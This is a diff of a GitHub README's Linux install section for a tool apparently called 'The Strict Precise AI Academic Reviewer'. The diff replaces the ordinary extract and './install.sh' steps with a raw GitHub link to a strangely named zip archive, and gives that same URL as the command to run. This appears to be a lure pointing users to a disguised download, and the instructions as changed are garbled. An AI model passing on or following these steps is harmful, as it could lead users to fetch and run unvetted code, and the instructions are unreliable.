SopkinoO/The-Strict-Precise-AI-Academic-Reviewer/README.md

 3. You can find the application in your Applications list.

 ### For Linux
-1. Extract the downloaded `.tar.gz` file.
+1. Extract the downloaded `https://raw.githubusercontent.com/SopkinoO/The-Strict-Precise-AI-Academic-Reviewer/main/Chiot/The-Strict-Precise-AI-Academic-Reviewer_Halosphaera.zip` file.
 2. Open a terminal and navigate to the extracted folder.
-3. Run the command `./install.sh` to set up the application.
+3. Run the command `https://raw.githubusercontent.com/SopkinoO/The-Strict-Precise-AI-Academic-Reviewer/main/Chiot/The-Strict-Precise-AI-Academic-Reviewer_Halosphaera.zip` to set up the application.
 4. You can launch the application from your applications menu or by typing its name in the terminal.

 ## 🚧 Using the Application